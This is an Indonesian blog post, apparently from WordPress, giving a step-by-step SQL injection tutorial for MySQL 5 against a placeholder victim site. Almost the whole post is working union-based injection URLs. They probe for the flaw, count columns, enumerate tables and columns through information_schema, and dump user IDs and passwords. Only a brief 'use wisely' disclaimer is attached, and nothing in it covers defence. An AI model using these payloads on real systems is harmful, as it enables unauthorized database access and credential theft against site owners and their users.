Oleh: em44y | 12 Maret, 2010

SQL Injection Versi 5 MySQL

hanya sekedar Info, gunakan secara bijak

 

## test-vulner=

http://korban.com/injek/index.php?id=4�

(muncul error=maybe vulner)

## angka ajaib=

http://korban.com/injek/index.php?id=4+order+by+4–

(angka 4 bisa diganti sampai muncul error, misal 6 error berarti cuma nyampai 5)

http://korban.com/injek/index.php?id=-4+union+select+1,2,3,4,5–

(mencari angka ajaib)

http://korban.com/injek/index.php?id=-4+union+select+1,concat(user(),0×3a,database()),version(),4,5–

(angka ajaib bisa diganti:database(),user(),version())

## table=

http://korban.com/injek/index.php?id=-4+union+select+1,2,group_concat(table_name),4,5

+from+information_schema.tables+where+table_schema=database()–

(angka ajaib ganti dengan: group_concat(table_name) dan diakhir tambahin:+from+information_schema.tables+where+table_schema=database()–)

## kolom=

http://korban.com/injek/index.php?id=-4+union+select+1,2,group_concat(column_name),4,5

+from+information_schema.columns+where+table_name=0×7461626c655f75736572–

(7461626c655f75736572=hexa dari nama tabel yang anda temukan)
(situs konversi:www.string-functions.com/string-hex.aspx)

## finishing=

http://korban.com/injek/index.php?id=-4+union+select+1,2,group_concat(user_id,0×3a,password_id),4,5

+from+table_user

(table_user= tergantung nama table yang kalian temukan)

Moga kalian paham dengan penjelasan diatas, klo kalian ga paham… email me atau googling lagi yach!! semangat buat belajar…hehehehehe

Ref http://annotes.wordpress.com/2010/03/11/sql-injection-versi-5-mysql/

Iklan

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Kategori

%d blogger menyukai ini: